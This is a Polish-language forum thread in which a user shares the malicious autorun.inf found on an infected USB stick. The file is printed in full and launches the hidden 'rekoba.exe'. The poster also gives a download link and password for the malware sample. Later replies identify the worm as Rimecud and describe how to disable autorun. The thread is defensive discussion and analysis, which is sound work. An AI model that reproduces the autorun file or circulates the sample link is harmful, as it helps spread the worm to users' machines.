Malware do sprawdzenia

Ych, korzystam czasami z różnych punktów ksero, ale żeby przywlec wira, to mi się pierwszy raz zdarzyło... Na penie znalazłem więc poniższy autorun.inf:

[autorun]
!
USEAUTOPLAY=1
shell\open\command=delpijero\rekoba.exe
;
icon=%SystemRoot%\system32\SHELL32.dll,4
:
Shell\open\command=delpijero\rekoba.exe
}
shellexecute=delpijero\rekoba.exe
@
open=delpijero\\rekoba.exe
>
shell\explore\command=delpijero\rekoba.exe
shell\install\command=delpijero\rekoba.exe
,
action=Open folder to view file using Windows Explorer
.

oraz ukryty, kosz systemowy... czyli wspomniany 'delpijero'. Autorun mam generalnie wyłączony, ale patrząc na powyższe mam jednak wątpliwości czy na pewno ani razu się ten syf nie odpalił, zwłaszcza, że wyświetlenie plików na penie trwało nieco dłużej niż zwykle. [W zasadzie to wystarczy zastąpić exeka własnym, który np. zapisuje coś do pliku... ale to wieczorem sprawdzę]

VirusTotal - http://www.virustotal.com/pl/analisis/310d8bc11054771ffb9a4034e0544af0ff0aca77ccfe900f3aa122a8a08d3d70-1274360245
Jak widać niektóre z całkiem popularnych antywirów nie widzą w pliku nic złośliwego, obawiam się jednak, że się mylą.

Jak wspomniałem - nie jestem pewien czy syf ten się odpalił... jeśli tak, to chciałbym wiedzieć czy należę teraz do botnetu spamującego viagrą, czy może powoli znikają mi wszystkie pliki z dysku... Exeka mam zachowanego, mógłbym udostępnić komuś z tutejszych eksperów, z drugiej strony nie chcę rzucać tu wirem o słabej wykrywalności, coby nikt sobie krzywdy nie zrobił :)

Tak więc - jest ktoś chętny do analizy tegoż? Pod wieczór może przygotuję sobie maszynę wirtualną i tam pozwolę temu działać, ale jeśli chodzi o analizę kodu tych rozmiarów to jednak jestem zbyt cienki :)

eee, wrzuc gdzies exeka i zapodaj na forum ;)

Ok, niech więc będzie...

http://www.przeklej.pl/plik/rekoba-zip-0015av50l1dc hasło do archiwum: kuku

Ok, autorun.inf nie działa mi ani pod Win Seven, ani pod skonfigurowanym XP - nice. Dodatkowo odpaliłem to cudo pod VM - widać, że od razu otwiera okienko z dyskiem C:, stąd u mnie raczej się nie uruchomiło...

Kunai napisał(a)

Tak więc - jest ktoś chętny do analizy tegoż? Pod wieczór może przygotuję sobie maszynę wirtualną i tam pozwolę temu działać, ale jeśli chodzi o analizę kodu tych rozmiarów to jednak jestem zbyt cienki :)

No właśnie, wrzuciłem to w IDA, kod na pierwszy rzut oka wygląda jak jakaś graficzna app, tylko nie rozumiem skąd te dziwaczne wartości uchwytów oraz porównywanie wersji Windowsa... A dalej IDA podpowiada, że kod uległ modyfikacji w locie. A jeszcze dalej odpadam :P

Pod IDA nic ciekawego raczej nie znajdziesz... Nie warto w tym przypadku tracić czas na analizę tego malware - http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Worm%3aWin32%2fRimecud
W celu uniknięcia kłopotów z infekcjami w różnych punktach, polecam pobrać ten program http://www.pandasecurity.com/homeusers/downloads/usbvaccine/ i zabezpieczyć wszystkie nośniki - tworzy on własne pliki autorun, dzięku czemu nawet jeśli dojdzie do infekcji to skopiowane na pendrive'a malware będzie "martwe".

lord_zero

We wszystkich "moich" komputerach – własnych oraz tych które mam „pod opieką” (rodzina, znajomi) autorun na pendrive'y jest wyłączony (NoDriveAutoRun plus NoDriveTypeAutoRun filtrują wszystko poza określonymi napędami dvd) i jak do tej pory bez żadnych incydentów. Jak widzę takiego syfa to go po prostu z pena kasuję, bez wzrostu ciśnienia w tętnicach ;-)

O, zapomniałem o tym wątku całkowicie.

lord_zero napisał(a)

Pod IDA nic ciekawego raczej nie znajdziesz...

Bez przesady, malware jest potraktowany fajnym crypterem/protectorem, trochę kodu ma pisanego w czystym asm (crypter znaczy, nie malware jako taki), w typowo scenowym stylu, raczej warty zobaczenia.

Oczywiście takie rzeczy jak dword(0x29a) w przeskakiwanym kawałku pamięci poprawiają humor.

Nie protector miałem na myśli lecz kod właściwy malware a ten - wnioskując po opisie - nie wygląda na interesujący.

To prawda, że takie niepozorne 0x29A może poprawić humor i nakłonić do odkurzenia starych materiałów grupy ;)

lord_zero